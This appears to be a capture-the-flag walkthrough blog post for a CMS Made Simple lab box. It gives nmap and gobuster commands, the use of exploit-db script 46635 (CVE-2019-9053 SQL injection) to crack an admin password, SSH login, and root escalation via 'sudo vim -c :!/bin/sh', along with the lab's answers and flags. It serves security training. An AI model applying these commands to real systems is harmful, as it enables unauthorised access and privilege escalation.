Task 1 : How many services are running under port 1000?
Using Nmap we will do a full scan. We could use the -p 1-1000 since the question asks for ports under 1000 but we will do a full scan to get the lay of the land.
# nmap -A -p- -Pn 10.10.224.21 -oN nmap_output
-A : Enables OS detection, version detection, script scanning, and traceroute
-p- : Scan all ports
-Pn : Disable host discovery. Port scan only. (No ping)
-oN : Output to normal file (nmap_output)
![](https://slashparity.com/wp-content/uploads/2021/09/image-11-1024x635.png)
Answer 1 : Two (2)
Task 2 : What is running on the higher port?
The higher port is 2222
Answer 2 : SSH
Question 3 : What’s the CVE you’re using against the application?
Let’s have a look on the web app running on the server. I am going to use gobuster for this scan.
# gobuster dir -u http://10.10.224.21 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt -t 10
![](https://slashparity.com/wp-content/uploads/2021/09/image-12-1024x291.png)
dir : directory bruteforcing
-u : target URL
-w : wordlist
-t : thread count
Gobuster returned an interesting directory /simple. After navigating to this url, we can see that the application running on the server is called CMS made simple.
![](https://slashparity.com/wp-content/uploads/2021/09/image-18-1024x428.png)
First result for “CMS made simple exploit” on google points to exploit-db exploit CMS Made Simple < 2.2.10-SQLInjection
https://www.exploit-db.com/exploits/46635
https://nvd.nist.gov/vuln/detail/CVE-2019-9053
![](https://slashparity.com/wp-content/uploads/2021/09/image-19-1024x217.png)
Answer 3 : CVE-2019-9053
Task 4 : To what kind of vulnerability is the application vulnerable?
From the CVE description we can see it’s vulnerable to an SQL injection
Answer 4 : SQLi
Task 5 : What’s the password
HINT :You can use /usr/share/seclists/Passwords/Common-Credentials/best110.txt to crack the pass
In the /simple there is link to :
![](https://slashparity.com/wp-content/uploads/2021/09/image-20-1024x106.png)
http://10.10.190.221/simple/admin/login.php
![](https://slashparity.com/wp-content/uploads/2021/09/image-21.png)
![](https://slashparity.com/wp-content/uploads/2021/09/image-22.png)
For this, we will use the exploit we found earlier, CVE-2019-9053. This exploit already exists in the latest version of Kali.
# searchsploit cms made simple 2.2.8
![](https://slashparity.com/wp-content/uploads/2021/09/image-24-1024x121.png)
This script is written in Python2, latest version of Kali use Python3 so we will need to convert the script using 2to3.
https://stackoverflow.com/questions/31228927/how-to-use-install-python-2to3
# apt install 2to3 # apt install python3-lib2to3 # apt install python3-toolz # find / -type f -name 46635.py # python3 -m lib2to3 /usr/share/exploitdb/exploits/php/webapps/46635.py -w
![](https://slashparity.com/wp-content/uploads/2021/09/image-25-1024x385.png)
Now let’s run the script.
# python3 46635.py -u http://10.10.186.183/simple --crack -w /usr/share/dirb/wordlists/others/best110.txt
After a long long wait we got two hits.
Username : mitch
Password : secret
![](https://slashparity.com/wp-content/uploads/2021/09/image-26.png)
Answer 5 : secret
Task 6 : Where can you login with the details obtained?
First try was a success, SSH on port 2222
# ssh [email protected] -p 2222
![](https://slashparity.com/wp-content/uploads/2021/09/image-27.png)
And I also managed to connect to the admin panel at :
http://10.10.186.183/simple/admin/
![](https://slashparity.com/wp-content/uploads/2021/09/image-28-1024x366.png)
Answer 6 : SSH
Task 7 : What’s the user flag?
Having a look at the home directory.
![](https://slashparity.com/wp-content/uploads/2021/09/image-30.png)
Answer 7 : G00d j0b, keep up!
Task 8 : Is there any other user in the home directory? What’s its name?
Task 9 : What can you leverage to spawn a privileged shell?
$ cd /home && ls -la $ sudo -l
![](https://slashparity.com/wp-content/uploads/2021/09/image-31.png)
On the home directory we can see there is another user called sunbath.
Running the sudo -l command will let us know which commands we can run on the system.
Answer 8 : sunbath
Answer 9 : vim
Task 10 : What’s the root flag?
First stop for binary exploitation gtfobins.
https://gtfobins.github.io/gtfobins/vim/
![](https://slashparity.com/wp-content/uploads/2021/09/image-32-1024x351.png)
$ sudo vim -c ':!/bin/sh'
![](https://slashparity.com/wp-content/uploads/2021/09/image-34.png)
Answer 10 : W3ll d0n3. You made it!